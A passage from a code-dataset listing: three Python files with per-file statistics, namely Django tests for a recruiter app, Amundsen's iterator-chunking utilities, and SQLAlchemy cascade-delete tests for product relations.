        response, 'recruiter/company/recruiter_profile.html')
    # Activation toggling redirects every time (twice for the same
    # recruiter, once for an unknown id).
    response = self.client.get(reverse(
        'recruiter:activate_company_recruiter', kwargs={'recruiter_id': self.recruiter.id}))
    self.assertEqual(response.status_code, 302)
    response = self.client.get(reverse(
        'recruiter:activate_company_recruiter', kwargs={'recruiter_id': self.recruiter.id}))
    self.assertEqual(response.status_code, 302)
    response = self.client.get(
        reverse('recruiter:activate_company_recruiter', kwargs={'recruiter_id': '100'}))
    self.assertEqual(response.status_code, 302)
def test_company_recruiter_create(self):
    """Creating sub-recruiters under the logged-in company account."""
    self.assertTrue(
        self.client.login(email='recruiter@mp.com', password='mp'))
    create_url = reverse('recruiter:company_recruiter_create')
    # The creation form renders on GET.
    response = self.client.get(create_url)
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(
        response, 'recruiter/company/create_recruiter.html')
    # A complete payload creates a recruiter.
    response = self.client.post(create_url, data={
        'mobile': '8977455970',
        'email': 'testrecruiter@mp.com',
        'job_role': 'developer',
        'first_name': 'testreruiter',
        'password': 'Mp1234@'})
    self.assertEqual(response.status_code, 200)
    body = json.loads(response.content.decode('utf-8'))
    self.assertEqual(
        body, {'response': 'Recruiter Created Successfully', 'error': False})
    # Second payload (different email, mobile supplied).
    response = self.client.post(create_url, data={
        'email': 'testrecruiter1@mp.com',
        'job_role': 'developer',
        'first_name': 'testreruiter',
        'password': 'Mp1234@', 'mobile': '9010757124'})
    self.assertEqual(response.status_code, 200)
    body = json.loads(response.content.decode('utf-8'))
    expected = {
        'response': {'mobile': ['This field is required.']}, 'error': True}
    # NOTE(review): assertTrue(a, b) only checks truthiness of `a` (`b` is
    # the failure message) — assertEqual was probably intended, but since
    # 'mobile' IS supplied above, switching would likely change the test's
    # outcome; confirm before fixing.
    self.assertTrue(body, expected)
def test_company_recruiter_edit(self):
    """Editing a company recruiter; unknown ids 404 on GET and POST."""
    self.assertTrue(
        self.client.login(email='recruiter@mp.com', password='mp'))
    self.url = reverse('recruiter:edit_company_recruiter', kwargs={
        'recruiter_id': self.company_recruiter.id})
    # The edit form renders for an existing recruiter.
    response = self.client.get(self.url)
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(
        response, 'recruiter/company/create_recruiter.html')
    # Unknown recruiter id -> 404 on both GET and POST.
    missing_url = reverse(
        'recruiter:edit_company_recruiter', kwargs={'recruiter_id': '100'})
    self.assertEqual(self.client.get(missing_url).status_code, 404)
    response = self.client.post(missing_url, data={
        'mobile': '0987654321',
        'email': self.company_recruiter.email,
        'job_role': 'developer123',
        'first_name': 'testreruiter123',
        'password': 'Mp1234@'})
    self.assertEqual(response.status_code, 404)
def test_company_recruiter_delete(self):
    """Deleting a company recruiter: success for an existing id, generic
    failure payload for an unknown one."""
    self.assertTrue(
        self.client.login(email='recruiter@mp.com', password='mp'))
    self.url = reverse('recruiter:delete_company_recruiter', kwargs={
        'recruiter_id': self.company_recruiter.id})
    response = self.client.get(self.url)
    self.assertEqual(response.status_code, 200)
    body = json.loads(response.content.decode('utf-8'))
    self.assertEqual(
        body, {'error': False, 'response': 'Recruiter Deleted Successfully'})
    # Unknown id -> generic failure.
    response = self.client.get(
        reverse('recruiter:delete_company_recruiter', kwargs={'recruiter_id': '100'}))
    self.assertEqual(response.status_code, 200)
    body = json.loads(response.content.decode('utf-8'))
    self.assertEqual(body, {'error': True, 'response': 'Some Problem Occurs'})
def test_interview_location(self):
    """The add-interview-location fragment renders for a posted
    location count."""
    self.assertTrue(
        self.client.login(email='recruiter@mp.com', password='mp'))
    response = self.client.post(
        reverse('recruiter:interview_location',
                kwargs={'location_count': '1'}),
        data={'selected_locations': '1'})
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(
        response, 'recruiter/job/add_interview_location.html')
def test_twitter_logins(self):
    """POSTing to the Twitter login endpoint issues a redirect."""
    resp = self.client.post(reverse('recruiter:twitter_login'))
    self.assertEqual(resp.status_code, 302)
def test_facebook_login(self):
    """POSTing to the Facebook login endpoint issues a redirect."""
    resp = self.client.post(reverse('recruiter:facebook_login'))
    self.assertEqual(resp.status_code, 302)
def test_linkedin_login(self):
    """POSTing to the LinkedIn login endpoint issues a redirect."""
    resp = self.client.post(reverse('recruiter:linkedin_login'))
    self.assertEqual(resp.status_code, 302)
def test_google_login(self):
    """POSTing to the Google connect endpoint issues a redirect."""
    resp = self.client.post(reverse('recruiter:google_connect'))
    self.assertEqual(resp.status_code, 302)
| 58.863257
| 152
| 0.44641
| 9,049
| 112,782
| 5.349873
| 0.045419
| 0.043069
| 0.051786
| 0.065295
| 0.90151
| 0.880172
| 0.86691
| 0.849414
| 0.832848
| 0.812191
| 0
| 0.024193
| 0.442198
| 112,782
| 1,915
| 153
| 58.893995
| 0.745335
| 0.016279
| 0
| 0.77491
| 0
| 0
| 0.224985
| 0.045783
| 0
| 0
| 0
| 0
| 0.131453
| 1
| 0.033013
| false
| 0.039016
| 0.004202
| 0
| 0.044418
| 0.0006
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4c6e568cdd83bb768e17d17c023c0df9ecc2be94
| 14,739
|
py
|
Python
|
amundsengremlin/amundsen_gremlin/utils/streams.py
|
evenlwanvik/RD-dataplatform-datakatalog
|
3f46978c4b50c032299940a196f61613f935e529
|
[
"Apache-2.0"
] | 19
|
2020-09-13T04:23:16.000Z
|
2022-01-20T13:48:41.000Z
|
amundsengremlin/amundsen_gremlin/utils/streams.py
|
evenlwanvik/RD-dataplatform-datakatalog
|
3f46978c4b50c032299940a196f61613f935e529
|
[
"Apache-2.0"
] | 13
|
2020-09-18T19:15:19.000Z
|
2022-01-13T22:45:43.000Z
|
amundsengremlin/amundsen_gremlin/utils/streams.py
|
evenlwanvik/RD-dataplatform-datakatalog
|
3f46978c4b50c032299940a196f61613f935e529
|
[
"Apache-2.0"
] | 12
|
2020-09-04T19:22:25.000Z
|
2022-01-13T20:41:39.000Z
|
# Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import logging
import threading
from typing import (
Any, AsyncIterator, Callable, Collection, Iterable, Iterator, List,
Optional, Tuple, TypeVar, Union
)
from typing_extensions import Final, final
LOGGER = logging.getLogger(__name__)
V = TypeVar('V')
R = TypeVar('R')
def one(ignored: Any) -> int:
    """Constant weight function: every element counts as 1, regardless of
    the (ignored) argument."""
    return 1
class PeekingIterator(Iterator[V]):
    """Iterator wrapper adding peek(), peek_default(), take_peeked() and
    has_more().

    peek() buffers at most one look-ahead value; __next__() consumes the
    buffered value before advancing the wrapped iterator.  A Lock guards
    the one-slot buffer against concurrent access from other threads.

    Fixes: assert messages were f-strings without placeholders (F541) and
    misspelled "peeked" as "peaked".
    """

    def __init__(self, iterable: Iterable[V]):
        self.it: Final[Iterator[V]] = iterable if isinstance(iterable, Iterator) else iter(iterable)
        self.has_peeked_value = False
        self.peeked_value: Optional[V] = None
        # RLock could make sense, but it would be just weird for the same
        # thread to try to peek from the same blocking iterator.
        self.lock: Final[threading.Lock] = threading.Lock()

    @final
    # @overrides Iterator but @overrides doesn't like
    def __next__(self) -> V:
        """Return the previously peeked value or advance the iterator.

        :raises StopIteration: if there are no more values
        """
        with self.lock:
            value: V
            if self.has_peeked_value:
                value = self.peeked_value  # type: ignore
                self.peeked_value = None
                self.has_peeked_value = False
            else:
                value = next(self.it)
            assert not self.has_peeked_value
            return value

    @final
    def peek(self) -> V:
        """Return the buffered value, fetching one from the iterator if
        the buffer is empty.  Repeated peeks return the same value.

        :raises StopIteration: if there are no more values
        """
        with self.lock:
            if not self.has_peeked_value:
                self.peeked_value = next(self.it)
                self.has_peeked_value = True
            assert self.has_peeked_value
            return self.peeked_value  # type: ignore

    @final
    def peek_default(self, default: Optional[V]) -> Optional[V]:
        """Like peek(), but return *default* instead of raising when the
        iterator is exhausted."""
        try:
            return self.peek()
        except StopIteration:
            return default

    @final
    def take_peeked(self, value: V) -> None:
        """Consume the buffered value, asserting it is exactly *value*
        (identity comparison)."""
        with self.lock:
            assert self.has_peeked_value, 'expected to find a peeked value'
            assert self.peeked_value is value, 'expected the peeked value to be the same'
            self.peeked_value = None
            self.has_peeked_value = False

    @final
    def has_more(self) -> bool:
        """True if at least one more value is available (may buffer it)."""
        try:
            self.peek()
            return True
        except StopIteration:
            return False
class PeekingAsyncIterator(AsyncIterator[V]):
    """
    Like AsyncIterator, but with peek(), peek_default(), and take_peeked().

    NOTE(review): a synchronous threading.Lock is held across awaits on the
    underlying iterator, which can block the event loop if the source blocks;
    presumably each instance is driven by a single task — confirm with callers.
    """
    def __init__(self, iterable: AsyncIterator[V]):
        """
        :param iterable: the underlying async source (used as-is)
        """
        self.it: Final[AsyncIterator[V]] = iterable
        self.has_peeked_value = False
        self.peeked_value: Optional[V] = None
        # RLock could make sense, but it would be just weird for the same thread to try to peek from same blocking
        # iterator
        self.lock: Final[threading.Lock] = threading.Lock()

    @final
    # @overrides AsyncIterator but @overrides doesn't like
    async def __anext__(self) -> V:
        """
        :return: the previously peeked value or the next
        :raises StopAsyncIteration: if there are no more values
        """
        with self.lock:
            value: V
            if self.has_peeked_value:
                value = self.peeked_value  # type: ignore
                self.peeked_value = None
                self.has_peeked_value = False
            else:
                # BUG FIX: this previously awaited self.__anext__() (itself),
                # which re-enters the non-reentrant lock and deadlocks;
                # advance the *underlying* iterator instead.
                value = await self.it.__anext__()
            assert not self.has_peeked_value
            return value

    @final
    async def peek(self) -> V:
        """
        :return: the previously peeked value or the next (which becomes the peeked value)
        :raises StopAsyncIteration: if there are no more values
        """
        with self.lock:
            if not self.has_peeked_value:
                self.peeked_value = await self.it.__anext__()
                self.has_peeked_value = True
            assert self.has_peeked_value
            return self.peeked_value  # type: ignore

    @final
    async def peek_default(self, default: Optional[V]) -> Optional[V]:
        """
        :return: the previously peeked value or the next, or default if no more values
        """
        try:
            return await self.peek()
        except StopAsyncIteration:
            return default

    @final
    def take_peeked(self, value: V) -> None:
        """
        Consume the value returned by a prior peek(); must be the very same object.
        """
        with self.lock:
            # plain strings here: nothing to interpolate, and the messages
            # previously misspelled 'peeked' as 'peaked'
            assert self.has_peeked_value, 'expected to find a peeked value'
            assert self.peeked_value is value, 'expected the peeked value to be the same'
            self.peeked_value = None
            self.has_peeked_value = False

    @final
    async def has_more(self) -> bool:
        """
        :return: True if another value is available (peeking it as a side effect)
        """
        try:
            await self.peek()
            return True
        except StopAsyncIteration:
            return False
def one_chunk(*, it: PeekingIterator[V], n: int, metric: Callable[[V], int]) -> Tuple[Iterable[V], bool]:
    """
    Collect the next chunk of values from the stream.

    :param it: stream of values as a PeekingIterator (or regular iterable if you are only going to take the first
        chunk and don't care about the peeked value being consumed)
    :param n: accumulate values until their combined metric reaches n
    :param metric: the callable that returns positive metric for a value
    :returns a pair: (the chunk as a tuple, whether the stream has more values)
    """
    collected: List[V] = []
    total: int = 0
    try:
        while True:
            candidate = it.peek()
            weight = metric(candidate)
            # negative would be insane, let's say positive
            assert weight > 0, \
                f'expected metric to be positive! item_metric={weight}, metric={metric}, item={candidate}'
            oversized_first = not collected and weight > n
            if not oversized_first and total + weight > n:
                # taking this value would overflow the chunk; leave it peeked for the next one
                break
            if oversized_first:
                # should we assert instead? it's probably a surprise to the caller too, and might fail for whatever
                # limit they were trying to avoid, but let's give them a shot at least.
                LOGGER.error(f"expected a single item's metric to be less than the chunk limit! {weight} > {n}, "
                             f"but returning to make progress")
            collected.append(candidate)
            it.take_peeked(candidate)
            total += weight
            if oversized_first or total >= n:
                # the chunk is full (or holds the single oversized value)
                break
    # don't catch other exceptions, let those be a concern for callers
    except StopIteration:
        pass
    return tuple(collected), it.has_more()
def chunk(it: Union[Iterable[V], PeekingIterator[V]], n: int, metric: Callable[[V], int] = one
          ) -> Iterable[Iterable[V]]:
    """
    Yield successive chunks from the stream.

    :param it: stream of values as a PeekingIterator (a regular iterable is wrapped in one)
    :param n: consume stream until n is reached. if n is 0, process whole stream as one chunk.
    :param metric: the callable that returns positive metric for a value
    :returns the Iterable (generator) of chunks
    """
    peeking = it if isinstance(it, PeekingIterator) else PeekingIterator(it)
    more = True
    while more:
        batch, more = one_chunk(it=peeking, n=n, metric=metric)
        # suppress a trailing empty chunk once the stream is exhausted
        if batch or more:
            yield batch
async def async_one_chunk(
        it: PeekingAsyncIterator[V], n: int, metric: Callable[[V], int] = one) -> Tuple[Iterable[V], bool]:
    """
    Collect the next chunk of values from an async stream.

    :param it: stream of values as a PeekingAsyncIterator (a plain AsyncIterator is wrapped in one)
    :param n: accumulate values until their combined metric reaches n
    :param metric: the callable that returns positive metric for a value
    :returns a pair: (the chunk as a tuple, whether the stream has more values)
    """
    if not isinstance(it, PeekingAsyncIterator):
        it = PeekingAsyncIterator(it)
    collected: List[V] = []
    total: int = 0
    try:
        while True:
            candidate = await it.peek()
            weight = metric(candidate)
            # negative would be insane, let's say positive
            assert weight > 0, \
                f'expected metric to be positive! item_metric={weight}, metric={metric}, item={candidate}'
            oversized_first = not collected and weight > n
            if not oversized_first and total + weight > n:
                # taking this value would overflow the chunk; leave it peeked for the next one
                break
            if oversized_first:
                # should we assert instead? it's probably a surprise to the caller too, and might fail for whatever
                # limit they were trying to avoid, but let's give them a shot at least.
                LOGGER.error(f"expected a single item's metric to be less than the chunk limit! {weight} > {n}, "
                             f"but returning to make progress")
            collected.append(candidate)
            it.take_peeked(candidate)
            total += weight
            if oversized_first or total >= n:
                # the chunk is full (or holds the single oversized value)
                break
    # don't catch other exceptions, let those be a concern for callers
    except StopAsyncIteration:
        pass
    return tuple(collected), await it.has_more()
async def async_chunk(*, it: Union[AsyncIterator[V], PeekingAsyncIterator[V]], n: int, metric: Callable[[V], int]
                      ) -> AsyncIterator[Iterable[V]]:
    """
    Yield successive chunks from an async stream.

    :param it: stream of values as a PeekingAsyncIterator (a plain AsyncIterator is wrapped in one)
    :param n: consume stream until n is reached. if n is 0, process whole stream as one chunk.
    :param metric: the callable that returns positive metric for a value
    :returns an AsyncIterator (async generator) of chunks
    """
    peeking = it if isinstance(it, PeekingAsyncIterator) else PeekingAsyncIterator(it)
    more = True
    while more:
        batch, more = await async_one_chunk(it=peeking, n=n, metric=metric)
        # suppress a trailing empty chunk once the stream is exhausted
        if batch or more:
            yield batch
def reduce_in_chunks(*, stream: Iterable[V], n: int, initial: R,
                     consumer: Callable[[Iterable[V], R], R], metric: Callable[[V], int] = one) -> R:
    """
    Fold the consumer over the stream, one chunk at a time.

    :param stream: stream of values
    :param n: consume stream until n is reached. if n is 0, process whole stream as one chunk.
    :param metric: the callable that returns positive metric for a value
    :param initial: the initial state
    :param consumer: the callable to handle the chunk
    :returns the final state
    """
    if n <= 0:
        # degenerate case: hand the entire stream to the consumer at once
        return consumer(stream, initial)
    state = initial
    for batch in chunk(it=PeekingIterator(stream), n=n, metric=metric):
        state = consumer(batch, state)
    return state
async def async_reduce_in_chunks(*, stream: AsyncIterator[V], n: int, metric: Callable[[V], int], initial: R,
                                 consumer: Callable[[Iterable[V], R], R]) -> R:
    """
    Fold the (synchronous) consumer over an async stream, one chunk at a time.

    :param stream: async stream of values
    :param n: if n is 0, process whole stream as one chunk
    :param metric: the callable that returns positive metric for a value
    :param initial: the initial state
    :param consumer: the callable to handle the chunk
    :returns the final state
    """
    if n <= 0:
        # degenerate case: materialize the whole stream and hand it over in one go
        return consumer(tuple([_ async for _ in stream]), initial)
    state = initial
    async for batch in async_chunk(it=PeekingAsyncIterator(stream), n=n, metric=metric):
        state = consumer(batch, state)
    return state
def consume_in_chunks(*, stream: Iterable[V], n: int, consumer: Callable[[Iterable[V]], None],
                      metric: Callable[[V], int] = one) -> int:
    """
    Feed the stream to the consumer one chunk at a time.

    :param stream: stream of values
    :param n: consume stream until n is reached; if n is 0, process whole stream as one chunk
    :param metric: the callable that returns positive metric for a value
    :param consumer: the callable to handle each chunk
    :return: the total number of items consumed
    """
    count = 0

    def _count_and_forward(batch: Iterable[V], ignored: None) -> None:
        nonlocal count
        materialized = _assure_collection(batch)
        assert isinstance(materialized, Collection)  # appease the types
        count += len(materialized)
        consumer(materialized)

    reduce_in_chunks(stream=stream, n=n, initial=None, consumer=_count_and_forward, metric=metric)
    return count
# NB: This will not work on python 3.6; requires 3.7 or later
async def async_consume_in_chunks(*, stream: AsyncIterator[V], n: int, consumer: Callable[[Iterable[V]], None],
                                  metric: Callable[[V], int] = one) -> int:
    """
    Feed an async stream to the (synchronous) consumer one chunk at a time.

    :param stream: async stream of values
    :param n: consume stream until n is reached; if n is 0, process whole stream as one chunk
    :param metric: the callable that returns positive metric for a value
    :param consumer: the callable to handle each chunk
    :return: the total number of items consumed
    """
    count = 0

    def _count_and_forward(batch: Iterable[V], ignored: None) -> None:
        nonlocal count
        materialized = _assure_collection(batch)
        assert isinstance(materialized, Collection)  # appease the types
        count += len(materialized)
        consumer(materialized)

    await async_reduce_in_chunks(stream=stream, n=n, initial=None, consumer=_count_and_forward, metric=metric)
    return count
def consume_in_chunks_with_state(*, stream: Iterable[V], n: int, consumer: Callable[[Iterable[V]], None],
                                 state: Callable[[V], R], metric: Callable[[V], int] = one) -> Iterable[R]:
    """
    Feed the stream to the consumer one chunk at a time, also mapping each
    consumed item through state.

    :param stream: stream of values
    :param n: consume stream until n is reached; if n is 0, process whole stream as one chunk
    :param consumer: the callable to handle each chunk
    :param state: mapped over every consumed item; results are collected in consumption order
    :param metric: the callable that returns positive metric for a value
    :return: the collected state results as a tuple
    """
    seen: List[R] = []

    def _record_and_forward(batch: Iterable[V], ignored: None) -> None:
        materialized = _assure_collection(batch)
        assert isinstance(materialized, Collection)  # appease the types
        seen.extend(state(item) for item in materialized)
        consumer(materialized)

    reduce_in_chunks(stream=stream, n=n, initial=None, consumer=_record_and_forward, metric=metric)
    return tuple(seen)
def _assure_collection(iterable: Iterable[V]) -> Collection[V]:
if isinstance(iterable, Collection):
return iterable
else:
return tuple(iterable)
| 37.59949
| 119
| 0.609675
| 1,867
| 14,739
| 4.70166
| 0.110873
| 0.050125
| 0.026658
| 0.03691
| 0.821486
| 0.809182
| 0.797676
| 0.779904
| 0.749487
| 0.728982
| 0
| 0.00215
| 0.305855
| 14,739
| 391
| 120
| 37.695652
| 0.85583
| 0.1954
| 0
| 0.704918
| 0
| 0.008197
| 0.053114
| 0.005022
| 0
| 0
| 0
| 0
| 0.07377
| 1
| 0.07377
| false
| 0.008197
| 0.016393
| 0.004098
| 0.196721
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d5dd15c91bca01a5a0d6d1b1c9ab65b075634452
| 7,433
|
py
|
Python
|
tests/models/product/product_relations/test_delete_cascade.py
|
simonsobs/acondbs
|
6ca11c2889d827ecdb2b54d0cf3b94b8cdd281e6
|
[
"MIT"
] | null | null | null |
tests/models/product/product_relations/test_delete_cascade.py
|
simonsobs/acondbs
|
6ca11c2889d827ecdb2b54d0cf3b94b8cdd281e6
|
[
"MIT"
] | 24
|
2020-04-02T19:29:07.000Z
|
2022-03-08T03:05:43.000Z
|
tests/models/product/product_relations/test_delete_cascade.py
|
simonsobs/acondbs
|
6ca11c2889d827ecdb2b54d0cf3b94b8cdd281e6
|
[
"MIT"
] | 1
|
2020-04-08T15:48:28.000Z
|
2020-04-08T15:48:28.000Z
|
from acondbs.db.sa import sa
from acondbs.models import Product, ProductRelation
##__________________________________________________________________||
def test_cascade_delete_children(app):
    """Deleting a child product cascades to the relations on both sides."""

    def find(name):
        return Product.query.filter_by(name=name).one_or_none()

    # initial state:
    #                           +--------+
    #              --(child)--> |        |
    #              |            | child1 |
    #  +---------+ <-(parent)-- |        |
    #  |         |              +--------+
    #  | parent1 |
    #  |         |              +--------+
    #  +---------+ --(child)--> |        |
    #              |            | child2 |
    #              <-(parent)-- |        |
    #                           +--------+

    # delete child1
    with app.app_context():
        sa.session.delete(find("child1"))
        sa.session.commit()

    # only parent1 <-> child2 should remain linked (both directions)
    with app.app_context():
        parent1 = find("parent1")
        child1 = find("child1")
        child2 = find("child2")
        assert parent1 is not None
        assert child1 is None
        assert child2 is not None
        relations = ProductRelation.query.all()
        assert len(relations) == 2
        assert len(parent1.relations) == 1
        assert parent1.relations[0].other == child2
        assert child2.relations[0].other == parent1
        assert child2.relations[0] == parent1.relations[0].reverse

    # delete child2
    with app.app_context():
        sa.session.delete(find("child2"))
        sa.session.commit()

    # parent1 is now alone and no relations remain
    with app.app_context():
        parent1 = find("parent1")
        assert parent1 is not None
        assert find("child1") is None
        assert find("child2") is None
        assert len(ProductRelation.query.all()) == 0
        assert len(parent1.relations) == 0
##__________________________________________________________________||
def test_cascade_delete_parent(app):
    """Deleting the parent product removes all relations; children survive."""
    # initial state: parent1 <-> child1 and parent1 <-> child2,
    # each pair linked by a (child)/(parent) relation in both directions

    # delete parent1
    with app.app_context():
        # one_or_none() for consistency with every other lookup in this module
        # (first() would silently pick an arbitrary row if the name were duplicated)
        parent1 = Product.query.filter_by(name="parent1").one_or_none()
        sa.session.delete(parent1)
        sa.session.commit()

    # child1 and child2 remain, now unrelated
    with app.app_context():
        parent1 = Product.query.filter_by(name="parent1").one_or_none()
        child1 = Product.query.filter_by(name="child1").one_or_none()
        child2 = Product.query.filter_by(name="child2").one_or_none()
        assert parent1 is None
        assert child1 is not None
        assert child2 is not None
        relations = ProductRelation.query.all()
        assert 0 == len(relations)
##__________________________________________________________________||
def test_cascade_delete_relations(app):
    """Deleting one direction of a relation also deletes its reverse; products survive."""

    def find(name):
        return Product.query.filter_by(name=name).one_or_none()

    # initial state:
    #                           +--------+
    #              --(child)--> |        |
    #              |            | child1 |
    #  +---------+ <-(parent)-- |        |
    #  |         |              +--------+
    #  | parent1 |
    #  |         |              +--------+
    #  +---------+ --(child)--> |        |
    #              |            | child2 |
    #              <-(parent)-- |        |
    #                           +--------+

    # delete the relation from child1 to parent1
    with app.app_context():
        child1 = find("child1")
        sa.session.delete(child1.relations[0])
        sa.session.commit()

    # child1 is now unrelated; parent1 <-> child2 remains (both directions)
    with app.app_context():
        parent1 = find("parent1")
        child1 = find("child1")
        child2 = find("child2")
        assert parent1 is not None
        assert child1 is not None
        assert child2 is not None
        relations = ProductRelation.query.all()
        assert len(relations) == 2
        assert len(parent1.relations) == 1
        assert parent1.relations[0].other == child2
        assert child2.relations[0].other == parent1
        assert child2.relations[0] == parent1.relations[0].reverse

    # delete the relation from parent1 to child2
    with app.app_context():
        parent1 = find("parent1")
        sa.session.delete(parent1.relations[0])
        sa.session.commit()

    # all three products remain but no relations do
    with app.app_context():
        assert find("parent1") is not None
        assert find("child1") is not None
        assert find("child2") is not None
        assert len(ProductRelation.query.all()) == 0
##__________________________________________________________________||
| 33.481982
| 71
| 0.404413
| 534
| 7,433
| 4.990637
| 0.08427
| 0.090056
| 0.135084
| 0.150094
| 0.89531
| 0.860788
| 0.849531
| 0.82364
| 0.82364
| 0.746717
| 0
| 0.028688
| 0.437239
| 7,433
| 221
| 72
| 33.633484
| 0.608415
| 0.431185
| 0
| 0.822785
| 0
| 0
| 0.03078
| 0
| 0
| 0
| 0
| 0
| 0.367089
| 1
| 0.037975
| false
| 0
| 0.025316
| 0
| 0.063291
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.